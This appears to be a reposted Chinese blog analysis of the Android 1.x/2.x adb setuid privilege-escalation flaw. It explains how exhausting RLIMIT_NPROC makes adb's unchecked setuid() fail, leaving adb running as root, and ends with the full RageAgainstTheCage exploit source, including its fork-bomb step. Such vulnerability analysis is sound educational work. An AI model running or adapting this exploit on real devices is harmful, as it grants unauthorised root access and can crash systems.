Android adb setuid提权漏洞的分析

最新推荐文章于 2021-05-30 08:46:29 发布
最新推荐文章于 2021-05-30 08:46:29 发布
阅读量831 收藏
点赞数
分类专栏: Android
作 者: Claud
时 间: 2011-07-07,13:03:41

链 接: http://bbs.pediy.com/showthread.php?t=136707


去年的Android adb setuid提权漏洞被用于各类root刷机,漏洞发现人 Sebastian Krahmer 公布的利用工具RageAgainstTheCage(rageagainstthecage-arm5.bin)被用于z4root等提权工具、Trojan.Android.Rootcager等恶意代码之中。下面我们来分析这一漏洞的产生原因。

The Android Exploid Crew小组在后来发布了一份PoC代码: rageagainstthecage.c 。从这份代码开始着手。

在main(:72)函数中,首先获取了RLIMIT_NPROC的值(:83),这个值是Linux内核中定义的每个用户可以运行的最大进程数。

然后,调用find_adb()函数(:94)来搜索Android系统中adb进程的PID,具体而言,该函数读取每个进程对应的文件的/proc/<pid>/cmdline,根据其是否等于”/sbin/adb”来判断是否adb进程。

接下来,fork了一个新的进程(:109),父进程退出,而子进程继续。接下来,在113行创建一个管道。

rageagainstthecage.c
代码: 
if (fork() > 0)
    exit(0);
 
setsid();
pipe(pepe);
重头戏发生在下面的122到138行,代码如下:

rageagainstthecage.c
代码: 
if (fork() == 0) {
    close(pepe[0]);
    for (;;) {
        if ((p = fork()) == 0) {
            exit(0);
        } else if (p < 0) {
            if (new_pids) {
                printf("\n[+] Forked %d childs.\n", pids);
                new_pids = 0;
                write(pepe[1], &c, 1);
                close(pepe[1]);
            }
        } else {
            ++pids;
        }
    }
}
新建一个进程后,在子进程之中,exploit代码不断地fork()(:125),而新的子进程不断退出,从而产生大量的僵尸进程(占据shell用户的进程数)。最终,进程数达到上限,fork()返回小于0,于是打印当前已经创建多少子进程,并向管道输入一个字符(:131)。

在这里,管道的作用是和(:122)fork出来的父进程同步,该进程在141行read这一管道,因而阻塞直至僵尸进程已经达到上限(:131)。

进一步的,exploit杀掉adb进程,并在系统检测到这一现象并重启一个adb之前,再一次fork(),将前一个adb留下的进程空位占据。最后,在152行,exploit调用wait_for_root_adb(),等待系统重启一个adb,这个新建的adb就会具有root权限。

为什么在shell用户的进程数达到上限RLIMIT_NPROC以后,新建的adb会具有root权限?我们来看adb的源码。

在<android_src>/system/core/adb/adb.c的第918行,我们可以看到如下代码:

android_src/system/core/adb/adb.c
代码: 
/* then switch user and group to "shell" */
if (setgid(AID_SHELL) != 0) {
    exit(1);
}
if (setuid(AID_SHELL) != 0) {
    exit(1);
}
这已经是漏洞修补以后的代码。在漏洞最初被发现时,代码如下:

android_src/system/core/adb/adb.c
代码: 
/* then switch user and group to "shell" */
setgid(AID_SHELL);
setuid(AID_SHELL);
简而言之,原来没有检查setuid()函数的返回值。事实上,在此之前,adb.c中的代码都是以root权限运行,以完成部分初始化工作。在这一行,通过调用setuid()将用户从root切换回shell,但setuid()在shell用户进程数达到上限RLIMIT_NPROC时,会失败,因此adb.c继续以root身份运行,而没有报错。

我们来看setuid()的man手册(man 2 setuid),其中有如下说明:

man 2 setuid
代码: 
RETURN VALUE
       On  success,  zero is returned.  On error, -1 is returned, and errno is
       set appropriately.
 
ERRORS
       EAGAIN The uid does not match the current uid and  uid  brings  process
              over its RLIMIT_NPROC resource limit.
可以看到,setuid是可能发生错误的,并且在uid的进程数超过RLIMIT_NPROC极限时,发生EAGAIN错误。

在android的源码中,setuid()定义于<android_src>/bionic/libc/unistd/setuid.c,实际上引用了一个外部符号__setuid,这个符号在<android_src>/bionic/libc/arch_xxx/syscalls/__setuid.S中定义,最终是一个%eax=$__NR_setuid32,%ebx=uid的int 0×80中断。

因为只是要分析原理,我们不再鏖战于Android,转而看向Linux内核。

在最新的kernel2.6中,setuid()位于kernel/sys.c的682行,其中,在697行,一切正常的情况下,它会调用set_user()来完成用户切换。

set_user()实现于同一文件的587行,其中一部分代码如下:

kernel/sys.c
代码: 
if (atomic_read(&new_user->processes) >= rlimit(RLIMIT_NPROC) &&
        new_user != INIT_USER) {
    free_uid(new_user);
    return -EAGAIN;
}
含义很明显,当目标用户的进程数达到上限,那系统就不能再将一个进程分配给它,因而返回-EAGEIN。然后再setuid()中,直接跳过后面的代码,而返回错误。

至此,整个漏洞的原理已经分析完毕。整理如下:

1、在Android的shell用户下,制造大量的僵尸进程,直至达到shell用户的进程数上限RLIMIT_NPROC;

2、kill当前系统中的adb进程,并再次占据其进程位置以保持达到上限;

3、系统会在一段时间后重启一个adb进程,该进程最初是root用户,在完成少许初始化工作后,调用setuid()切换至shell用户;

4、此时shell用户的进程数已经达到上限,所以setuid()失败,返回-1,并且用户更换没有完成,adb还是root权限;

5、adb没有检查setuid()的返回值,继续后续的工作,因此产生了一个具有root权限的adb进程,可以被用于与用户的下一步交互。

实际上,setuid在目标用户进程数达到RLIMIT_NPROC极限时返回错误,这一问题可能产生的安全隐患最早可以追溯到 2000年 。而在2006年,出现了真正利用这一编码问题的漏洞( CVE-2006-2607 )。

因此,这并不是一个全新的漏洞。我们可以得出几点结论:

1、函数返回值一直是忽略的对象,因为getuid()永远不会失败,程序员可能会认为setuid()也不会失败——至少没有遇到过,因此忽略了对返回值的检查。检查一个系统函数是否调用失败是一个常识,但又是很麻烦的事,如果为了省事而忽略,问题就可能产生了。

2、Android下的安全问题,很多并非全新的,而且个人判断将来还会有大量漏洞、恶意代码产生于传统思路,而作用于新的平台。面对这一新的平台,我们是否能抢先于攻击者做好防范准备,是一个需要我们思考和实践的问题。

---------------------------------------------------------------------


附rageagainstthecage.c源代码

[cpp]   view plain copy 在CODE上查看代码片 派生到我的代码片
  1. /* android 1.x/2.x adb setuid() root exploit 
  2.  * (C) 2010 The Android Exploid Crew 
  3.  * 
  4.  * Needs to be executed via adb -d shell. It may take a while until 
  5.  * all process slots are filled and the adb connection is reset. 
  6.  * 
  7.  * !!!This is PoC code for educational purposes only!!! 
  8.  * If you run it, it might crash your device and make it unusable! 
  9.  * So you use it at your own risk! 
  10.  */  
  11. #include <stdio.h>  
  12. #include <sys/types.h>  
  13. #include <sys/time.h>  
  14. #include <sys/resource.h>  
  15. #include <unistd.h>  
  16. #include <fcntl.h>  
  17. #include <errno.h>  
  18. #include <string.h>  
  19. #include <signal.h>  
  20. #include <stdlib.h>  
  21.   
  22.   
  23. void die(const char *msg)  
  24. {  
  25.     perror(msg);  
  26.     exit(errno);  
  27. }  
  28.   
  29. pid_t find_adb()  
  30. {  
  31.     char buf[256];  
  32.     int i = 0, fd = 0;  
  33.     pid_t found = 0;  
  34.   
  35.     for (i = 0; i < 32000; ++i) {  
  36.         sprintf(buf, "/proc/%d/cmdline", i);  
  37.         if ((fd = open(buf, O_RDONLY)) < 0)  
  38.             continue;  
  39.         memset(buf, 0, sizeof(buf));  
  40.         read(fd, buf, sizeof(buf) - 1);  
  41.         close(fd);  
  42.         if (strstr(buf, "/sbin/adb")) {  
  43.             found = i;  
  44.             break;  
  45.         }  
  46.         }  
  47.         return found;  
  48. }  
  49.   
  50.   
  51. void restart_adb(pid_t pid)  
  52. {  
  53.     kill(pid, 9);  
  54. }  
  55.   
  56.   
  57. void wait_for_root_adb(pid_t old_adb)  
  58. {  
  59.     pid_t p = 0;  
  60.   
  61.     for (;;) {  
  62.         p = find_adb();  
  63.         if (p != 0 && p != old_adb)  
  64.             break;  
  65.         sleep(1);  
  66.     }  
  67.     sleep(5);  
  68.     kill(-1, 9);  
  69. }  
  70.   
  71.   
  72. int main(int argc, char **argv)  
  73. {  
  74.     pid_t adb_pid = 0, p;  
  75.     int pids = 0, new_pids = 1;  
  76.     int pepe[2];  
  77.     char c = 0;  
  78.     struct rlimit rl;  
  79.   
  80.     printf("[*] CVE-2010-EASY Android local root exploit (C) 2010 by 743C\n\n");  
  81.     printf("[*] checking NPROC limit ...\n");  
  82.   
  83.     if (getrlimit(RLIMIT_NPROC, &rl) < 0)  
  84.         die("[-] getrlimit");  
  85.   
  86.     if (rl.rlim_cur == RLIM_INFINITY) {  
  87.         printf("[-] No RLIMIT_NPROC set. Exploit would just crash machine. Exiting.\n");  
  88.         exit(1);  
  89.     }  
  90.   
  91.     printf("[+] RLIMIT_NPROC={%lu, %lu}\n", rl.rlim_cur, rl.rlim_max);  
  92.     printf("[*] Searching for adb ...\n");  
  93.   
  94.     adb_pid = find_adb();  
  95.   
  96.     if (!adb_pid)  
  97.         die("[-] Cannot find adb");  
  98.   
  99.     printf("[+] Found adb as PID %d\n", adb_pid);  
  100.     printf("[*] Spawning children. Dont type anything and wait for reset!\n");  
  101.     printf("[*]\n[*] If you like what we are doing you can send us PayPal money to\n"  
  102.            "[*] 7-4-3-C@web.de so we can compensate time, effort and HW costs.\n"  
  103.            "[*] If you are a company and feel like you profit from our work,\n"  
  104.            "[*] we also accept donations > 1000 USD!\n");  
  105.     printf("[*]\n[*] adb connection will be reset. restart adb server on desktop and re-login.\n");  
  106.   
  107.     sleep(5);  
  108.   
  109.     if (fork() > 0)  
  110.         exit(0);  
  111.   
  112.     setsid();  
  113.     pipe(pepe);  
  114.   
  115.     /* generate many (zombie) shell-user processes so restarting 
  116.      * adb's setuid() will fail. 
  117.      * The whole thing is a bit racy, since when we kill adb 
  118.      * there is one more process slot left which we need to 
  119.      * fill before adb reaches setuid(). Thats why we fork-bomb 
  120.      * in a seprate process. 
  121.      */  
  122.     if (fork() == 0) {  
  123.         close(pepe[0]);  
  124.         for (;;) {  
  125.             if ((p = fork()) == 0) {  
  126.                 exit(0);  
  127.             } else if (p < 0) {  
  128.                 if (new_pids) {  
  129.                     printf("\n[+] Forked %d childs.\n", pids);  
  130.                     new_pids = 0;  
  131.                     write(pepe[1], &c, 1);  
  132.                     close(pepe[1]);  
  133.                 }  
  134.             } else {  
  135.                 ++pids;  
  136.             }  
  137.         }  
  138.     }  
  139.   
  140.     close(pepe[1]);  
  141.     read(pepe[0], &c, 1);  
  142.   
  143.   
  144.     restart_adb(adb_pid);  
  145.   
  146.     if (fork() == 0) {  
  147.         fork();  
  148.         for (;;)  
  149.             sleep(0x743C);  
  150.     }  
  151.   
  152.     wait_for_root_adb(adb_pid);  
  153.     return 0;  
  154. }  


DirtyCow漏洞复现(新、脏牛、大脏牛、Linux、Android
墨痕诉清风的博客
02-25 2726
编译好的EXP下载地址:https://github.com/Brucetg/DirtyCow-EXP 该漏洞是 Linux 内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞, 导致可以破坏私有只读内存映射。黑客可以在获取低限的的本地用户后,利用漏洞获取 其他只读内存映射的写限,进一步获取 root 限。 1.Linux Ubuntu 14.04 : 1)添加用户: sudo adduser test 输入两次密码后一直回车就行,查看当前用户的..
浅析adbd setuid
少仲
04-23 1067
/* author:少仲 blog: http://blog.csdn.net/py_panyu weibo: http://weibo.com/u/3849478598 欢迎转载,转载请注明出处. */ 0x1 漏洞描述 ADB守护进程(adbd进程)以root限开始启动,然后降到shell用户.在Android2.2及以前的版本中,ADB守护进程在降时不会检查se
Android中的限管理(基于uid gid gids setUid
jltxgcy的专栏
09-07 6794
我们首先来说一下传统的Linux基于uid,gid的限管理机制: 1、用户的uid gid gids: Ubuntu操作系统当前登陆的用户是jltxgcy,那么该用户的uid为jltxgcy,gid也是jltxgcy,那么gids怎么查看呢? 答案是使用命令:cat /etc/group | grep jltxgcy。如下图: 用户的...
Android adb setuid漏洞分析(转)
weixin_30940783的博客
08-29 355
原文:http://blog.claudxiao.net/2011/04/android-adb-setuid/ 去年的Android adb setuid漏洞被用于各类root刷机,漏洞发现人Sebastian Krahmer公布的利用工具RageAgainstTheCagerageagainstthecage-arm5.bin)被用于z4root等工具、Trojan.Android...
Android adb setuid漏洞分析
wangkaiblog的专栏
10-17 1163
/* android 1.x/2.x adb setuid() root exploit * (C) 2010 The Android Exploid Crew * * Needs to be executed via adb -d shell. It may take a while until * all process slots are filled and the adb con
android 守护进程setuid,守护进程 - web改变生活,生活改变web - OSCHINA - 中文开源技术交流社区...
weixin_42467627的博客
05-30 288
# server.pywhile True:continue好了现在我们已经有了一个服务器了, 接下来要做的事情就是让他跑到后台去。第一章, 原理本章仅作了解就可以了, 因为这些细节性的东西实在是无聊,所以我强烈推荐你直接跳到第二章。当然, 如果你有足够的耐心和能力, 还是看下去吧 ……通常我们把后台进程叫做 "守护进程"、"精灵进程", 或者 daemon。在 Unix 下, 我们使用 fork...
setuid()与seteuid()的区别
nyist327的专栏
08-30 6007
setuid()与seteuid()的区别.
android 跨进程注入,Android 系统漏洞分析
weixin_36329818的博客
05-28 1330
(一) 序言1.1什么是rootRoot——也就是我们这里说的系统,通常是针对Android系统的手机而言,它使得用户可以获取Android操作系统的超级用户限。root通常用于帮助用户越过手机制造商的限制,使得用户可以卸载手机制造商预装在手机中某些应用程序,以及运行一些需要超级用户限的应用程序。Android系统的root与AppleiOS系统的越狱类似。1.2如何实现root一般roo...
Androidroot漏洞,Android Binder Driver UAF 漏洞实现 Root 分析(CVE-2019-2215) - 嘶吼 RoarTalk – 回归最本质的信息安全,互...
weixin_28679635的博客
05-29 1468
0x00 漏洞描述当Project Zero紧急发布CVE-2019-2215漏洞公告时,我决定将漏洞利用代码复制到本地设备上进行复现分析。我正好有一个存在漏洞的Pixel 2手机。我需要做的就是编译漏洞exp并通过ADB运行exp代码。我下载了最新的Android NDK并编译了PoC:[grant~/Downloads/android-ndk-r20>>./toolchai...
Android漏洞分析——rageagainstthecage
Flass Blog
06-07 3044
Android adb setuid漏洞由Sebastian Krahmer在2010年公布,并发布利用工具RageAgainstTheCage..
ADB backupAgent 漏洞分析 (CVE-2014-7953)
sos995的专栏
02-27 2004
ADB backupAgent 漏洞分析 (CVE-2014-7953) hqdvista · 2015/04/21 14:48 0x00 摘要 CVE-2014-7953是存在于android backup agent中的一个漏洞。ActivityManagerService中的bindBackupAgent方法未能校验传入的uid参数,结合另外一个race c
android 守护进程setuid,【android学习笔记】init.rc中声明的守护进程启动的流程
weixin_35182419的博客
05-30 430
在Init.rc中,用service关键字声明了一系列服务.init.rc对service的说明如下:(详见system/core/init/readme.txt)Services--------Services are programs which init launches and (optionally) restartswhen they exit.Services take the fo...
Android系统篇之----Android中的run-as命令引出升降限的安全问题(Linux中的setuid和setgid)
shark1621的博客
04-20 870
转自:https://blog.csdn.net/d_o_n_g2/article/details/77483240 一、前言 最近一周比较忙,没时间写东西了,今天继续开始我们今天的话题:run-as命令,在上周的开发中,遇到一个问题,就是在使用run-as命令的时候出现了一个错误,不过当时因为工作进度的问题,这问题就搁浅没有解决,用了其他一个曲线救国的方式去解决的。那么咋们今天闲来说说...
Android Root
长歌的博客
08-22 2590
Root 通过内核漏洞获取最高限(superuser) root用户:linux的root用户相当于window的administrator管理员用户,控制操作系统的一切限 操作系统=系统内核+文件系统 linux系统= android系统 = linux内核+ 文件系统ext3/4 为什么root:一些app需要root,比如文件管理器,root后可以调用linux驱动,随时修改...
android+4.3+root+set-uid-root,Android4.3 user版本root
weixin_35950078的博客
05-27 312
Android user版本root:软件版本:android4.3硬件平台:marvell方案一:第一步,修改adb.c,添加可执行程序,完成root,修改如下:adb.c:注释掉下列部分,/* then switch user and group to "shell" */if (setgid(AID_SHELL) != 0) {exit(1);if (setuid(AID_SHELL) ...
关于Android的root漏洞
热门推荐
Tesi1a的充电桩
09-09 1万+
以下两个转自于知乎少仲哥 和flanker_hqd的回答:1.CVE-2009-2692(Wunderbar/asroot)sock_sendpage()的空指针解引用.因为sock_sendpage 没有对 socket_file_ops 结构的 sendpage 字段做指针检查,有些模块不具备sendpage 功能,初始时赋为 NULL,这样,没有做检查的sock_sendpage 有可能直接调
Android 内核对 setuid() 调用的限制
01-10 1973
在普通的 Linux 系统中,只要可执行文件设置了 s 限,就可以调用 setuid(0) 将自身升到 root。例如,我们编写下面的一段程序: #include #include #include void print(void) { printf( " UID GID \n"
漏洞总结-linux漏洞
smart的博客
09-02 7045
漏洞总结-linux漏洞CVE-2019-13272CVE-2016-5195 CVE-2019-13272 此漏洞只能在使用了pkexec验证程序的系统中可以成功。 受影响的系统 Ubuntu 16.04.5 kernel 4.15.0-29-generic Ubuntu 18.04.1 kernel 4.15.0-20-generic Ubuntu 19.04 kernel 5.0.0-15-generic Ubuntu Mate 18.04.2 kernel 4.1
Android中的UID、GID与应用安全
wangkaiblog的专栏
10-17 2676
Android系统是基于Linux内核的,也继承了Linux的基于用户和文件限的安全机制,并将这种机制用于管理应用程序。         Linux系统对用户的管理:Linux系统可以有多个用户,每个用户都有一个用户名:UserName,同时拥有一个UserID,两者是一一对应的。每个用户可以属于一个或者多个组。 Linux系统的文件限机制:每个文件都是属于某个用户的,这个用户称作文件
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值